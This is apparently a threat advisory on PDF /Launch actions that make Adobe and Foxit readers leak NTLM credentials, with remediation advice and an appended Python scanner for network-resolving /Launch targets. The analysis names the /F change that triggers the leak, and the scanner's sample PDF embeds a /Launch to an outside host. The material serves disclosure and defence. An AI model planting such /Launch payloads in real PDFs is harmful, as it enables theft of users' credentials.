Severity
High
Analysis Summary
Researchers have discovered a “zero-day behavior” in PDF files that could leak sensitive NTLM authentication data when processed by Adobe Reader and Foxit Reader. This vulnerability arises from the way these readers handle specific /Launch actions in PDF files, potentially allowing attackers to steal NTLM credentials. While no malicious intent was found in the analyzed samples, this behavior demonstrates a significant security risk, particularly in Windows network environments.
The behavior is triggered when a PDF reader processes a /Launch action whose /F entry names a file path; the analyzed sample used /F (/Applications/Calculator.app/Contents/MacOS/Calculator). In Adobe Reader, handling this path opens a connection to a network resource and sends NTLM credentials before any user warning appears. Adobe stressed that this behavior is restricted to intranet domains and is consistent with its trust model, but an attacker already positioned inside a private network could exploit it to harvest the leaked credentials.
Foxit Reader behaves differently. The original sample did not leak NTLM data, but changing the /F field to reference a public domain, for example /F (/pub.expmon.com/test), caused NTLM credentials to be sent to the attacker-controlled server before any warning was displayed. Recognizing the severity, Foxit patched the issue in December 2024 with Foxit PDF Reader for Windows v2024.4.
Adobe downplayed the risk, stating that the behavior aligns with their trust model and occurs only with intranet domains, which are deemed trusted by default. In contrast, Foxit acknowledged the issue as a legitimate vulnerability, issuing a patch and urging users to update to the latest version. This disparity in responses underscores different approaches to handling potential security threats in widely used software.
Researchers highlighted the power of big data analytics (BDA) in uncovering these overlooked behaviors, demonstrating how retrospective analysis of files can improve exploit detection. Their discovery serves as a reminder of the risks posed by seemingly benign software actions. To mitigate threats, Adobe users should disable the “Automatically trust sites from Win OS security zones” feature, while Foxit users should update to the latest patched version.
Impact
- Sensitive Data Theft
- Unauthorized Access
Remediation
- Disable the “Automatically trust sites from Win OS security zones” feature within Acrobat’s settings to prevent NTLM authentication attempts for intranet domains. This limits the automatic trust of potentially unsafe intranet resources.
- Use a firewall to block unauthorized or suspicious outbound NTLM traffic, particularly to internal servers, to mitigate the risk of credential leaks.
- Ensure all users upgrade to Foxit Reader for Windows v2024.4 or higher; this version includes the patch for the vulnerability.
- Use tools to analyze and sanitize PDFs before opening them to ensure no malicious modifications, such as altered /Launch actions.
- Configure Foxit Reader’s security settings to restrict or block actions like launching external files or initiating network connections.
- Separate critical systems and user networks to minimize the impact of credential leaks within the same environment.
- Replace NTLM with more secure authentication protocols like Kerberos where feasible to reduce the risk of pass-the-hash attacks.
- Use IDS to monitor and alert on suspicious NTLM traffic or attempts to connect to unauthorized resources.
- Conduct awareness training on recognizing phishing attempts and avoiding opening potentially harmful files.
- Ensure that all software, including PDF readers, is up-to-date with the latest security patches.
- Continuously monitor network logs for unusual NTLM traffic patterns or unauthorized access attempts.
- Leverage big data analytics tools to retrospectively analyze files and detect zero-day behaviors or missed exploits in previously accessed files, improving the organization's overall threat detection capabilities.
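As an added example (not code from the advisory or from the researchers), the check below implements the PDF pre-screening recommended above: it pulls the /F target out of every /Launch action in a file and flags targets that would be resolved over the network (a leading slash or backslash, or a URL scheme) rather than from local disk. The input is a constructed skeletal PDF, not a real sample.

```python
import re

# Constructed sample (not a real-world file): a skeletal PDF with two /Launch
# actions, one using the slash-prefixed target quoted in the analysis above and
# one pointing at a local Windows file through the /Win sub-dictionary.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
4 0 obj
<< /Type /Action /S /Launch /F (/pub.expmon.com/test) >>
endobj
5 0 obj
<< /Type /Action /S /Launch /Win << /F (C:\\\\tools\\\\readme.txt) >> >>
endobj
%%EOF
"""

# A /Launch action is a dictionary containing /S /Launch; the file to open is its
# /F entry, written as a literal string (...) or a hex string <...>.
_LAUNCH_RE = re.compile(rb"/S\s*/Launch(?=(.{0,512}))", re.DOTALL)
_F_RE = re.compile(rb"/F\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")

def _decode_pdf_string(literal, hexstr):
    """Turn the matched PDF string into text, undoing only the escapes a path needs."""
    if hexstr is not None:
        return bytes.fromhex(hexstr.decode("ascii")).decode("latin-1")
    return literal.replace(b"\\\\", b"\\").replace(b"\\(", b"(").replace(b"\\)", b")").decode("latin-1")

def extract_launch_targets(pdf):
    """Return the /F target of every /Launch action found in the raw PDF bytes."""
    targets = []
    for match in _LAUNCH_RE.finditer(pdf):
        f_entry = _F_RE.search(match.group(1))  # first /F in the bytes after /Launch
        if f_entry:
            targets.append(_decode_pdf_string(f_entry.group(1), f_entry.group(2)))
    return targets

def is_network_target(target):
    """True for targets resolved over the network rather than from local disk: UNC paths,
    slash-prefixed paths like the sample above, or anything carrying a URL scheme."""
    t = target.strip()
    return t.startswith(("/", "\\")) or "://" in t

def scan_pdf(pdf):
    """Pair each /Launch target with a flag saying whether it is a credential-leak risk."""
    return [(t, is_network_target(t)) for t in extract_launch_targets(pdf)]

if __name__ == "__main__":
    for target, remote in scan_pdf(SAMPLE_PDF):
        print(f"{'NETWORK' if remote else 'local  '}  /Launch -> {target}")
```

A file with any flagged target should be quarantined or opened only in a reader whose /Launch handling is restricted, as the Foxit and Acrobat settings above describe.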